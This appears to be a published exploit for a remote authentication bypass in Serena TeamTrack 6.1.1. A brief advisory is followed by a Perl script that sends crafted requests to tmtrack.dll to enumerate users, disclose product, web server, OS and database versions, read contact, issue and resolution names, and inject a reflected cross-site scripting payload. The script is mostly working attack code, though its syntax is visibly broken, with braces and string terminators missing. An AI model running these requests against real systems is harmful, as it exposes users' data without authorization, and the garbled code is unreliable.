Serena TeamTrack 6.1.1 - Remote Authentication Bypass








It has been reported that Serena TeamTrack is affected by remote authentication bypass vulnerability. This issue is due to a design error that allows unauthenticated users to access sensitive scripts.

Successful exploitation of this issue will allow an attacker to gain access to sensitive information such as user names, software versions, user contact information, issues information and resolution information. This issue can also be exploited to carry out cross-site scripting attacks.


use IO::Socket;

if (($#ARGV+1) < 3)
 print " option host path
\t1 - Cross Site Scripting issue
\t2 - Enumerate users (First name)
\t3 - System information disclosure
\t4 - Contact name (default is Record ID 1)
\t5 - Name of Issue (default is Record ID 1)
\t6 - Name of Resolution (default is Record ID 1)

$option = $ARGV[0];
$host = $ARGV[1];
$path = $ARGV[2];

if ($option > 6)
 print "No such option\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";


my $http;

if ($option == 1)
 $http = "GET /$path/tmtrack.dll?LoginPage&Template=loginform&Message=<script>alert(document.cookie)</script> HTTP/1.0

# Cookie/Cross Site Scripting

if ($option == 2)
{ # Enumerate users
 $http = "GET /$path/tmtrack.dll?LoginPage&Template=user HTTP/1.0


if ($option == 3)
{ # Information disclosure
 $http = "GET /$path/tmtrack.dll?LoginPage&Template=about HTTP/1.0


if ($option == 4)
{ # Fullname for a certain ID
 $RecordID = 1;
 $http = "GET /$path/tmtrack.dll?LoginPage&Template=viewbody&recordid=$RecordID&tableid=38 HTTP/1.0


if ($option == 5)
{ # Issue name
 $RecordID = 1;
 $http = "GET /$path/tmtrack.dll?LoginPage&Template=viewbody&recordid=$RecordID&tableid=41 HTTP/1.0


if ($option == 6)
{ # Resolution name
 $RecordID = 1;
 $http = "GET /$path/tmtrack.dll?LoginPage&Template=viewbody&recordid=$RecordID&tableid=42 HTTP/1.0


print "HTTP: [$http]\n";
print $remote $http;
print "Sent\n";

my $display = 1;

if ($option == 2)
{ # Enumerate names
 $display = 0;
 # No need to display the complete HTML

if ($option == 3)
{ # System information disclosure
 $display = 0;

if ($option == 4 || $option == 5 || $option == 6)
 $display = 0;

while (<$remote>)
 if ($option == 2) # Enumerate names
  if (/<OPTION VALUE=([^>]+)>([^<]+)<\/OPTION>/)
  print "ID: $1, Name: $2\n";

 if ($option == 3)
  if (/<input type="hidden" name="Product_Version.*" value="[ ]+([^"]+)"/)
  print "Product version: $1\n";
  if (/<input type="hidden" name="WebServer.*" value="[ ]+([^"]+)"/)
  print "Web Server version: $1\n";
 if (/<input type="hidden" name="WebServer_OS.*" value="[ ]+([^"]+)"/)
  print "Server version: $1\n";
 if (/<input type="hidden" name="DBMS.*" value="[ ]+([^"]+)"/)
  print "Database version: $1\n";

 if ($option == 4)
  if (/Contact Details<\/span> - ([^<]+)</g)
  print "Full name: $1\n";

 if ($option == 5)
  if (/Problem Details<\/span> - ([^<]+)/g)
  print "Issue name: $1\n";

 if ($option == 6)
  if (/Resolution Details<\/span> - ([^<]+)/g)
   print "Resolution name: $1\n";
 if ($display)
  print $_;
print "\n";

close $remote;